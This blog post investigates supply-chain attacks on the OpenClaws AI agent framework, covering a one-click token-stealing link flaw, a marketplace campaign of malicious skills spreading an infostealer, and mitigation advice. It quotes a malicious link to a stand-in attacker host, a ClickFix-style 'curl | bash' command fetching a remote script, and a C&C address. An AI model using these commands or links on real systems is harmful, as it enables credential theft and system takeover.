Skip to main content
~/namish
TechnologyFebruary 3, 20267 min read

The OpenClaw's Supply Chain Attack You Need to Know

From one-click RCE to 341 malicious skills, the OpenClaws security crisis reveals what happens when AI agents meet 'vibe coding' culture. Here's the full investigation.

#security#ai-agents#supply-chain-attacks#openclaws#vulnerability-disclosure

CVE-2026-25253. CVSS 8.8. One click to full system compromise.

OpenClaws went from obscure project to 100,000+ GitHub stars in two months. The AI agent framework promised to democratize agentic coding, letting developers orchestrate complex tasks with natural language. What nobody anticipated was how quickly that promise would collide with security reality.

This isn't a story about a single vulnerability. It's about what happens when "vibe coding" culture—where developers ship code faster than they can review it—meets an ecosystem designed for AI agents to execute arbitrary commands on user systems.

The trail starts with one researcher's disclosure and ends with a systemic problem affecting a quarter of all agent skills analyzed.

The Original Sin: CVE-2026-25253

In late January 2026, security researcher Mav Levin from depthfirst published a disclosure that should have been a wake-up call for the entire AI agent ecosystem.

The vulnerability was elegant in its simplicity. OpenClaws uses a gateway architecture—a local server that bridges the AI agent to your system. When you launch MoltBot (the official OpenClaws client), it connects to this gateway and gains access to execute commands, read files, and manage your development environment.

Levin found that the gatewayUrl query parameter accepted arbitrary values without validation.

The attack chain:

  1. Victim clicks a link containing a malicious gatewayUrl parameter
  2. MoltBot auto-connects to the attacker's server during the WebSocket handshake
  3. The authentication token travels with the connection—directly to the attacker
  4. Attacker uses the captured token to connect to the victim's local gateway
  5. Safety restrictions disabled. Arbitrary code execution achieved.
Malicious Link:
moltbot://open?gatewayUrl=wss://attacker.example.com
 
Result:
- Auth token captured
- Local gateway compromised
- Full system access

One click. No additional interaction required.

"The interesting part isn't any single flaw," Levin wrote in the disclosure. "It's how multiple design decisions—auto-connect behavior, token exposure in handshakes, insufficient input validation—chain together into something far worse than the sum of its parts."

The vulnerability was patched on January 30, 2026. But by then, the ecosystem had already attracted more dangerous attention.

While You Were Sleeping: The ClawHavoc Campaign

As the community processed Levin's disclosure, security firm Koi Security was investigating something larger.

Their audit of ClawHub—the official marketplace for OpenClaws skills—revealed that 12% of audited skills were malicious. Not vulnerable. Not poorly written. Actively malicious.

The numbers:

  • 341 malicious skills identified
  • 335 belonged to a single coordinated campaign
  • Campaign codename: ClawHavoc

The payload was AMOS—Atomic Stealer—a macOS-targeted infostealer available as malware-as-a-service for $500-1000 per month. AMOS harvests everything: cryptocurrency wallets, browser credentials, saved passwords, SSH keys, session tokens.

What made ClawHavoc particularly insidious was the distribution method. The malicious skills used ClickFix-style social engineering—a technique that tricks users into executing malicious commands under the guise of "prerequisites" or "setup requirements."

A skill promising enhanced code review capabilities might display:

Setup Required:
Run this command to install dependencies:
 
curl -sL https://setup.clawtools[.]dev/init.sh | bash

The command pulls from infrastructure traced to 91.92.242.30, a C&C server hosting the AMOS payload.

The irony isn't lost on the researchers. Koi Security discovered this campaign while building a bot that itself became targeted by these malicious skills. The ecosystem designed to enhance developer productivity had become a vector for credential theft.

The Bigger Picture: Academia Sounds the Alarm

If ClawHavoc were an isolated incident, we could treat it as a criminal operation requiring takedowns and vigilance. But concurrent academic research suggests the problem is systemic.

An arXiv study analyzing 31,132 agent skills across multiple ecosystems found:

  • 26.1% contain at least one security vulnerability
  • 14 distinct vulnerability patterns identified
  • 5.2% show patterns suggesting malicious intent
  • Skills with bundled scripts are 2.12x more likely to be vulnerable

One in four skills. Not one in a hundred. One in four.

The vulnerability patterns include predictable problems—command injection, path traversal, insecure deserialization—but also AI-specific issues like prompt injection vectors and unsafe tool invocations.

1Password's "From Magic to Malware" analysis reinforces these findings. The report highlights how agent ecosystems create novel attack surfaces: skills can request permissions that seem reasonable in isolation but combine into dangerous capabilities. A skill that reads files and makes network requests might be legitimate—or might be exfiltrating your codebase.

This isn't unique to OpenClaws. The entire agent ecosystem has grown faster than security practices can adapt.

The Cultural Diagnosis: "Vibe Coding" Meets Security Reality

Context matters here. Peter Steinberger, a prominent developer advocate for OpenClaws, recently described his workflow philosophy: "I ship code I don't read." He embraces "vibe coding"—writing code on his phone, trusting AI to handle the details, prioritizing speed over scrutiny.

The Register characterized the OpenClaws situation as a "security dumpster fire." That's harsh but not inaccurate.

The broader trend is alarming. ClickFix attacks—the technique used in ClawHavoc—surged 517% in the first half of 2025. The method has been adopted by nation-state actors: Russia's APT28, Iran's MuddyWater. What started as commodity cybercrime now serves state-level espionage.

There's a genuine tension here. Open source velocity has produced remarkable tools. The "move fast" ethos enables rapid iteration and community contribution. Nobody wants bureaucratic approval processes slowing innovation.

But at what point does "move fast" become negligence?

When your framework executes arbitrary code on user systems, security isn't a feature to add later. It's foundational. When your marketplace distributes skills that control developer environments, verification isn't optional overhead.

The uncomfortable question: if you're shipping code you don't read, who's reading the code that runs on your users' machines?

What This Means for You

Three audiences need to respond to this differently.

If You Use OpenClaws or MoltBot

Immediate actions:

  • Update to version 2026.1.29 or later immediately
  • Audit every installed skill—remove anything you don't recognize or actively use
  • Review what permissions your agent has granted to skills
  • Enable sandboxing if available in your configuration

The CVE-2026-25253 patch addresses the one-click RCE, but if you installed skills during the ClawHavoc campaign window, your credentials may already be compromised. Rotate sensitive credentials, particularly API keys and SSH keys.

If You Build AI Agents

Design principles that matter:

  • Validate all external inputs. Every parameter. Every URL. Every callback.
  • Never expose authentication tokens in connection handshakes
  • Implement skill sandboxing by default, not as an opt-in feature
  • Code review security-critical paths manually—yes, even if AI wrote it

The OpenClaws vulnerability existed because multiple reasonable-seeming decisions combined badly. Auto-connect is convenient. Passing tokens in handshakes is simple. Accepting URL parameters enables deep linking. Each choice has a rationale. Together, they create an attack chain.

Security review needs to consider how features interact, not just whether individual features are safe.

If You Lead Engineering Teams

Strategic responses:

  • Treat skills and plugins like supply chain dependencies—because they are
  • Require security review before marketplace integrations go into production environments
  • Monitor agent behavior for anomalies: unexpected network connections, unusual file access patterns, permission escalation
  • Build security checkpoints into development workflows without destroying velocity

The balance between speed and security isn't binary. You can maintain rapid iteration while requiring that externally-sourced code passes basic verification. The cost of implementing review processes is measurable. The cost of a supply chain compromise is often not—until it happens.

The Pattern We Should Recognize

Three data points define this incident:

  • 1 critical RCE vulnerability enabling one-click compromise
  • 341 malicious skills in a coordinated infostealer campaign
  • 26.1% of skills containing security vulnerabilities across the ecosystem

"I ship code I don't read" works for personal projects with limited blast radius. It doesn't scale to frameworks controlling user systems and marketplaces distributing executable code to thousands of developers.

Security must be foundational in agent ecosystems, not an afterthought bolted on when incidents occur. The attack surface is too large, the potential impact too severe, and the speed of exploitation too fast for reactive approaches.

The question isn't whether we'll see more incidents like ClawHavoc. It's whether the ecosystem will learn from this one—or whether we'll treat it as an anomaly until the next campaign demonstrates otherwise.

AI agents represent genuine capability advancement. They also represent novel attack surfaces we're only beginning to understand. The developers building these systems, and the teams deploying them, need to internalize that reality.

The adults in the room are whoever decides to take security seriously before the next CVE forces the conversation.